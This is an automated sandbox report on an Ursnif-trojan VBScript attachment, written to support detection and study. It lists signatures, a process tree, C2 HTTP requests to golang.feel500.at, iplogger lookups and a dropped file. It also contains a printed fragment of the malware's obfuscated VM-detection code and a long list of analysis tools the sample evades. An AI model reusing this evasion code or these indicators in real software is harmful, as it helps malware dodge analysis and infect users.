Loading ...

Play interactive tourEdit tour

Analysis Report view_attach_72559.vbs

Overview

General Information

Sample Name:view_attach_72559.vbs
Analysis ID:331433
MD5:29933320f02dfc13999ff70cd960a291
SHA1:29db771aef8cfe3231e5f1b077bf49c096777043
SHA256:7c4f0d072bdbf9aaba20f96173a9274376d589a171ff96d4bfbb56427ea17f7c

Most interesting Screenshot:

Detection

Ursnif
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 960 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 5528 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBkab56Bm_2/FWmqnzUOX9_2B0/YbRWfB6IMq7TSr21K5FNM/xWmFuq_2FeEONGMO/1ZuPh_2FNFAeM3T/FM11WlspOeJ_2FqYpl/U_2F6jwXu/YXiyreYoS1UAkST_2FVa/JT_2Fx9W7QvoG6HJsdC/ExFIoNdpiPpyKG7cmJGp40/huNnlqBJ9uVVH/QyyRFE1b/30os8htaDb_2FAitT_2BOsm/SKMxwp3_0A/_0DyvsrFrDpoMB3eg/_2BPhnWhGFuU/FPA93GCv8Zd/FBoszW1uVg1_2B/gtKiRyRf4RAjLF4_2F0P1/_2FR HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
            Source: msapplication.xml0.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: iplogger.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Dec 2020 19:42:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmpString found in binary or memory: http://crl.com
            Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmpString found in binary or memory: http://crl.com9
            Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
            Source: {CFFA0380-3FD6-11EB-90EB-ECF4BBEA1588}.dat.17.dr, ~DFCE3CEB3DA92FCDD0.TMP.17.drString found in binary or memory: http://golang.feel500.at/api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBka
            Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
            Source: msapplication.xml.17.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.17.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.17.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.17.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.17.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.17.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.17.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.17.drString found in binary or memory: http://www.youtube.com/
            Source: wscript.exe, 00000000.00000003.711863605.000001C8B6372000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
            Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712532222.000001C8B5BEB000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712769407.000001C8B4CF0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/18j267
            Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/18j267Nums
            Source: wscript.exe, 00000000.00000003.712665350.000001C8B3A16000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1D5y47
            Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: view_attach_72559.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal84.troj.evad.winVBS@4/52@2/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFFA037E-3FD6-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: view_attach_72559.vbsStatic file information: File size 1478801 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\valueState\Redparagraph\unitList\Hislay\weight.pdb source: Oxnard.rb.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 2000If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) ThenExit FunctionEnd If' Kankakee blasphemy sunrise bramble screwworm ho religiosity. 8769309 hoot ambitious foppish grandmother tutu widen754 passerby scratchy892 bossy109. Verde274 Byrne. 4049332 Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_ComputerSystem")For Each rTSNo In kdDsaHAdlItemsKlcIhm = KlcIhm + Int((rTSNo.TotalPhysicalMemory) / (((81 - 2.0) + (1055520 - 278.0)) - 6745.0))NextIf KlcIhm < ((8197 - (7235 - 89.0)) - (22 - 1.0)) ThenHThYFgq' novo Auckland shrewd freedman persecutory thieves745 videotape Vega regent snowy cop cremate committee126 reticulum995 spigot charisma50 End IfREM regress bangle, 8711784 insubstantial359 michigan effectuate Reagan sin770 earmark discriminant notate. purify, conversion571 standeth vane ' sidereal600 evocate dance denude burst automorphism uranium Aldrich diffract stamp Bergland signal groan railway Erik villa Leon commendatory peptide alga End FunctionFunction spurn163()REM afternoon Barnhard230. alga500 whale Britain torso rapture slid indecomposable trudge Filipino. bazaar, big Hahn, cookery guilty debase, 419631 culprit Leland critic lusty cantor pater tate IEEE ceramic, 7701 crunchy verdict. effete, boulder voyage717 on error resume nextIf (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then' peak Bethlehem Terre Posner stifle Agee quartermaster204 NH dauphin nomad their neither scarves Exit FunctionREM autocollimate Giuliano attainder isle epidemic longue spoonful ambulant j Cinderella influenza hydrous Finn. Methuselah attune rectitude cervix End IfSet AlphonseService = GetObject("winmgmts:\\.\root\cimv2")Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_Processor", , (((4 + 300.0) - 267.0) + (28 - 17.0)))' Kelvin scoff castor niece bump fiefdom491 lap sing thieving yearbook hydroxide. milestone rule. regrettable, vivify. 2683417 Lausanne ounce complain For Each rTSNo In kdDsaHAdlItems' roundworm glad capitol beachhead. nay Malthus replica. acquaint ampere iodine vermilion saw If rTSNo.NumberOfCores < ((25 - (22 - (15 - 13.0))) - 2.0) Thenchaotic = True' bipolar dodecahedral518 indium polysemous documentation262 capacitance tine thicken stature crest187 petition adject spectrography polymeric howdy. sheave taft112 indubitable, conjuncture near End IfNextIf chaotic Then' industrial Allegheny bedstraw bestubble variety hornmouth Wilshire813 impute281 audiotape circumsphere retrofit botanic197 cotty caught grouse county irreverent. 7472456 nursery concertina. 7200157 Rena. 6227331 adipic tetravalent. 3544323 typeset bronco python possessor383 boil, spasm377 Carl HThYFgqEnd IfREM shenanigan tenebrous Borden Peruvian jackpot966 eke GU whatnot Burr Netherlands permafrost. 3030829 autocorrelate nectar recipe game hazel kayo Bose thereby blew extra End FunctionFunction tUtsn(PKdEVC)on error resum

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Oxnard.rbJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Oxnard.rbJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\view_attach_72559.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXEH
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: SANDBOXIERPCSS.EXE@V5
            Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Oxnard.rbJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 5588Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
